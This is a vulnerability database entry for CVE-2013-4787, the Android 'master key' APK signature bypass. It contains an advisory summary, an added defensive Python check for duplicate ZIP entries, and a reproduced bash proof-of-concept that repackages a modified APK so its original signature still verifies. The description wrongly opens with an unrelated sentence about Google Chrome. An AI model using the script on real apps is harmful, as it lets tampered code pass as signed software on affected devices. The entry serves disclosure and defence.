Android Donut/Jelly Bean APK Arbitrary Code Execution Vulnerability

Vulnerability ID: 1121743    Vulnerability type: Cryptographic issue
Published: 2013-07-03    Updated: 2013-07-10
CVE: CVE-2013-4787    CNNVD ID: CNNVD-201307-154
Platform: Android    CVSS score: 9.3
|Sources
https://www.exploit-db.com/exploits/38627
https://www.securityfocus.com/bid/60952
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201307-154
|Vulnerability details
Google Chrome is a web browser developed by Google (USA). Android is an open-source, Linux-based operating system developed jointly by Google and the Open Handset Alliance (OHA). Android versions 1.6 Donut through 4.2 Jelly Bean contain a vulnerability caused by the system failing to correctly check the cryptographic signature of applications. An attacker can modify an application package file (APK) in a way that does not invalidate its cryptographic signature and thereby execute arbitrary code.
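Added example, not part of the original advisory or of the PoC on this page: a defender-side check for the condition the PoC creates, namely an APK whose ZIP central directory lists the same entry name more than once (the PoC appends the original files to the rebuilt archive under names that already exist). The archive contents and file names below are constructed in memory for illustration; the check itself is the point.

```python
import io
import warnings
import zipfile
from collections import Counter


def build_constructed_apk(with_duplicate: bool = True) -> bytes:
    """Constructed sample standing in for an APK; the second copy is optional."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("AndroidManifest.xml", b"<manifest/>")
        z.writestr("classes.dex", b"dex\n035\x00ORIGINAL-SIGNED")
    if with_duplicate:
        # zipfile warns about the duplicate name but still writes the entry;
        # this is the same library behaviour the PoC's poc.py relies on.
        with warnings.catch_warnings():
            warnings.simplefilter("ignore")
            with zipfile.ZipFile(buf, "a") as z:
                z.writestr("classes.dex", b"dex\n035\x00MODIFIED")
    return buf.getvalue()


def duplicate_entries(apk_bytes: bytes) -> dict:
    """{name: count} for every name listed more than once in the central
    directory; a well-formed APK yields an empty dict."""
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as z:
        counts = Counter(info.filename for info in z.infolist())
    return {name: n for name, n in counts.items() if n > 1}


def lookup_by_name(apk_bytes: bytes, name: str) -> bytes:
    """What a name-keyed reader sees: the last central-directory record wins."""
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as z:
        return z.read(name)


def entry_payloads(apk_bytes: bytes, name: str) -> list:
    """Every copy of `name`, read through its own ZipInfo in directory order,
    so both the original entry and the appended one are visible."""
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as z:
        return [z.read(info) for info in z.infolist() if info.filename == name]


def is_safe_to_verify(apk_bytes: bytes) -> bool:
    """Hardened pre-check: reject ambiguous archives outright instead of
    letting the signature verifier and the loader each pick a different copy."""
    return not duplicate_entries(apk_bytes)
```

The disagreement between `lookup_by_name` and `entry_payloads` is the whole bug class: two components that resolve the same name differently will verify one copy and load another, so the only robust fix is to refuse any archive where a name is ambiguous.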
|Exploit (PoC)
#source: http://www.securityfocus.com/bid/60952/info
#
#Google Android is prone to a remote security-bypass vulnerability.
#
#Attackers can exploit this issue to bypass certain security restrictions to perform unauthorized actions. This may aid in further attacks. 

#!/bin/bash
# PoC for Android bug 8219321 by @pof
# +info: https://jira.cyanogenmod.org/browse/CYAN-1602
if [ -z "$1" ]; then echo "Usage: $0 <file.apk>" ; exit 1 ; fi
APK="$1"
rm -r out out.apk tmp 2>/dev/null
# Decode the APK so its contents can be edited
java -jar apktool.jar d "$APK" out
#apktool d "$APK" out
echo "Modify files, when done type 'exit'"
cd out
bash
cd ..
# Rebuild the (now unsigned) APK from the edited tree
java -jar apktool.jar b out out.apk
#apktool b out out.apk
mkdir tmp
cd tmp/
unzip "../$APK"
mv ../out.apk .
# Helper that appends a file to an existing ZIP without removing same-named entries
cat >poc.py <<-EOF
#!/usr/bin/python
import zipfile
import sys
z = zipfile.ZipFile(sys.argv[1], "a")
z.write(sys.argv[2])
z.close()
EOF
chmod 755 poc.py
for f in $(find . -type f | egrep -v "(poc.py|out.apk)") ; do ./poc.py out.apk "$f" ; done
cp out.apk "../evil-$APK"
cd ..
rm -rf tmp out
echo "Modified APK: evil-$APK"
|Affected products
Google Android 0
|References

plus.google.com: https://plus.google.com/113331808607528811927/posts/GxDA6111vYy
jira.cyanogenmod.org: https://jira.cyanogenmod.org/browse/CYAN-1602
www.zdnet.com: http://www.zdnet.com/google-releases-fix-to-oems-for-blue-security-android-security-hole-7000017782/
BID 60952: http://www.securityfocus.com/bid/60952
OSVDB 94773: http://www.osvdb.org/94773
review.cyanogenmod.org: http://review.cyanogenmod.org/#/c/45251/
bluebox.com: http://bluebox.com/corporate-blog/bluebox-uncovers-android-master-key/